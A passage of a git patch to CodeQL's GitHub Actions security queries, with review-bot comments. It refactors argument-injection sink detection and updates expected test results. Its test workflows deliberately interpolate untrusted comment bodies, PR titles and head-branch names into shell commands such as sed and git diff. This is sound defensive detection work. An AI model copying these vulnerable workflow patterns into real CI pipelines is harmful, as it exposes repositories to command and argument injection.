$GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Tue, 15 Oct 2024 09:48:01 +0200 Subject: [PATCH 586/707] Move arg injection sinks to ShellScript class --- ql/lib/codeql/actions/Ast.qll | 8 ++ ql/lib/codeql/actions/Bash.qll | 52 ++++++++++-- ql/lib/codeql/actions/PowerShell.qll | 12 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 8 ++ .../security/ArgumentInjectionQuery.qll | 58 +++---------- ql/test/library-tests/commands.expected | 84 +++++++++---------- .../.github/workflows/arg_injection.yml | 12 +++ .../ArgumentInjectionCritical.expected | 1 - 8 files changed, 139 insertions(+), 96 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 620f74e25bb8..e41354ce31b6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -354,6 +354,14 @@ class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) { + super.getAnEnvReachingArgumentInjectionSink(var, command, argument) + } + + predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) { + super.getACmdReachingArgumentInjectionSink(cmd, command, argument) + } + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 541ab437db2b..12866a141a66 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -133,7 +133,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { @@ -155,7 +156,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } override string getAStmt() { result = this.getStmt(_) } @@ -186,7 +188,8 @@ class BashShellScript extends ShellScript { this.doCmdRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { 
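Review bot: `not result.indexOf("qstr:") > -1` in the `@@ -133` hunk of Bash.qll reads as a guard for placeholder restoration that did not converge within the available rounds, and the same unexplained guard is repeated in the `@@ -155`, `@@ -186` and `@@ -208` hunks (`"cmdsubs:"` in the latter two); none of the four says why a statement or command may still contain a placeholder. The idiomatic QL form is `not result.matches("%qstr:%")` (resp. `"%cmdsubs:%"`), and each site needs a why-comment such as `// drop results whose placeholders were not fully restored; they are not valid statements`. If the unrestored case is reachable with real input, that is a silent loss of commands worth a test rather than a filter. The enclosing `getStmt`/`getCmd` predicates start outside these hunks.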
@@ -208,13 +211,16 @@ class BashShellScript extends ShellScript { this.doCmdRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } string getACmd() { result = this.getCmd(_) } override string getCommand(int i) { - result = this.getCmd(i) and + // remove redirection + result = + this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords @@ -286,6 +292,18 @@ class BashShellScript extends ShellScript { Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, command, argument) + } + override predicate fileToGitHubEnv(string path) { Bash::fileToFileWrite(this, "GITHUB_ENV", path) } 
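Review bot: The redirection stripping added to `getCommand` only removes a target made of `[{}$"'_\-0-9a-zA-Z]`, so `> /dev/null`, `>> out.txt`, `2>&1` and `&> file` are left in `result` and remain part of the command string later matched against `argumentInjectionSinksDataModel`, while `>> $GITHUB_OUTPUT` is removed; any sink regex that relies on the argument being the last token will therefore behave differently depending on where the output goes. Suggest widening the target class to include `/`, `.` and `&` and adding `&>` and `>&` to the operator alternation, e.g. `.regexpReplaceAll("(&>|>&|>>|>|2>>|2>|<<<|<)\\s*[\\{\\}\\$\"'_\\-./&0-9a-zA-Z]+$", "")`, or at least extending the `// remove redirection` comment to state which forms are intentionally not handled. The `@@ -286` hunk on this line is a plain override and needs no change.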
@@ -633,6 +651,30 @@ module Bash { ) } + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + cmdReachingRunExpr(script, source, argument) + ) + } + /** * Holds if a command output is used, directly or indirectly, in a Run's step expression. * Where the expression is a string captured from the Run's script. diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll index 1727930c2a3f..3ae706970fa7 100644 --- a/ql/lib/codeql/actions/PowerShell.qll +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -42,6 +42,18 @@ class PowerShellScript extends ShellScript { override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + none() + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + none() + } + override predicate fileToGitHubEnv(string path) { none() } override predicate fileToGitHubOutput(string path) { none() } 
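Review bot: `envReachingArgumentInjectionSink` and `cmdReachingArgumentInjectionSink` are identical except for the final reachability call, so the sink-matching part (command lookup, `argumentInjectionSinksDataModel`, the two `regexpCapture`s) is duplicated and will drift; the second commit on this page already has to patch `.trim()` into both copies. Factor the shared part into one private predicate that binds `command` and `argument` for a script and let both public predicates join on it. Neither predicate has QLDoc; the helper's doc is the natural place to explain the `command_group`/`argument_group` contract.
```ql
/**
 * Holds if `command` is a command of `script` that argumentInjectionSinksDataModel
 * models as an argument-injection sink, and `argument` is the text matched by the
 * model's argument group.
 */
private predicate argumentInjectionSinkCommand(
  BashShellScript script, string command, string argument
) {
  exists(string cmd, string regex, int command_group, int argument_group |
    cmd = script.getACommand() and
    argumentInjectionSinksDataModel(regex, command_group, argument_group) and
    argument = cmd.regexpCapture(regex, argument_group) and
    command = cmd.regexpCapture(regex, command_group)
  )
}

predicate envReachingArgumentInjectionSink(
  BashShellScript script, string source, string command, string argument
) {
  argumentInjectionSinkCommand(script, command, argument) and
  envReachingRunExpr(script, source, argument)
}

predicate cmdReachingArgumentInjectionSink(
  BashShellScript script, string source, string command, string argument
) {
  argumentInjectionSinkCommand(script, command, argument) and
  cmdReachingRunExpr(script, source, argument)
}
```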
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 43772a978c58..7c433a39e620 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -227,6 +227,14 @@ class ShellScriptImpl extends ScalarValueImpl { abstract predicate getACmdReachingGitHubPathWrite(string cmd); + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + abstract predicate fileToGitHubEnv(string path); abstract predicate fileToGitHubOutput(string path); diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index a0309437292a..f7e4a9834452 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,23 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var] -predicate envToArgInjSink(string var, Run run, string command) { - exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run.getScript(), var, argument) and - exists(run.getInScopeEnvVarExpr(var)) - ) -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. 
@@ -36,23 +19,16 @@ predicate envToArgInjSink(string var, Run run, string command) { */ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | - envToArgInjSink(var, run, command) and - run.getScript() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var)) - ) - or - exists( - Run run, string cmd, string argument, string regexp, int argument_group, int command_group - | - run.getScript().getACommand() = cmd and run.getScript() = this.asExpr() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ( + exists(run.getInScopeEnvVarExpr(var)) or + var = "GITHUB_HEAD_REF" + ) and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument) ) } @@ -68,18 +44,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { */ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromCommandSink() { - exists( - CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, - int command_group - | + exists(CommandSource source, Run run | run = source.getEnclosingRun() and this.asExpr() = run.getScript() and - cmd = run.getScript().getACommand() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) + run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument) ) } 
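Review bot: `var = "GITHUB_HEAD_REF"` in the `ArgumentInjectionFromEnvVarSink` constructor hard-codes the single default environment variable that is treated as externally controlled, and the same literal is repeated in `isSource` at @@ -103 further down this file. Hoist it into one documented predicate, e.g. `/** Default env vars whose value an external user controls: the PR head branch name. */ private string untrustedDefaultEnvVar() { result = "GITHUB_HEAD_REF" }`, and use it at both sites so the list can grow in one place. The new `argument` field is bound here but no accessor for it is visible in the hunk; if none exists elsewhere, a short comment saying it is kept only to pin the binding would stop the next reader from removing it.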
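Review bot: The rewritten `ArgumentInjectionFromCommandSink` constructor presumably relies on `source.getCommand()` being string-identical to the `cmd` that `getACmdReachingArgumentInjectionSink` compares against internally; any normalisation difference between the two producers (trailing whitespace, a stripped redirection) makes the conjunction silently empty with no diagnostic. A comment on the `run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument)` line should state which normalisation both sides are expected to share, and a library test pinning one command-to-sink flow would catch drift. The `argument` field is bound but has no visible accessor, as in the env-var sink above.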
@@ -103,14 +74,9 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource or - exists( - Run run, string argument, string cmd, string regexp, int command_group, int argument_group - | + exists(Run run | run.getScript() = source.asExpr() and - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _) ) } @@ -120,7 +86,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and - envToArgInjSink(var, run, _) + run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _) ) } } diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index e78f152e60b6..d5536ca1c74d 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected 
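Review bot: In `isSource` the Run script node becomes a source whenever `GITHUB_HEAD_REF` reaches a sink argument, and `ArgumentInjectionFromEnvVarSink` (@@ -36 above) makes the same node a sink under the same condition, so the reported path is a zero-length flow on a single node. That is presumably intentional, there being no expression node of its own for a default env var, but it is not obvious from the code; add `// GITHUB_HEAD_REF has no expression node, so the script using it is both source and sink` above the new `exists(Run run |`.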
@@ -22,15 +22,11 @@ | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< issue.txt << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | | 
.github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | 
@@ -84,77 +80,77 @@ | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | } | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | 
${ISSUE_BODY} | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo 
"$TITLE" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | } | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | } | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | } | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | 
@@ -171,7 +167,7 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 59ea1564bdd0..42ba8bf27496 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -34,3 +34,15 @@ jobs: - run: | BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo + + - name: Checkout ref + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Detect new changesets + id: added-files + run: | + delimiter="$(openssl rand -hex 8)" + echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" + echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" + echo "${delimiter}" >> "${GITHUB_OUTPUT}" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 326cb935f7c0..1e4051fef432 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
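Review bot: The new "Detect new changesets" step interpolates `${{ steps.comment-branch.outputs.base_sha }}` and `${{ steps.parse-sha.outputs.sha }}` straight into a `git diff` command, but nothing in the fixture says whether that is a positive or a negative case, and `ArgumentInjectionCritical.expected` in this commit gains no result for it. Add a comment above the step such as `# expected: no result - step outputs are not remote flow sources` (or its opposite, if a finding is intended), so the next change to the sink model does not flip this case unnoticed.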
@@ -26,5 +26,4 @@ subpaths | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
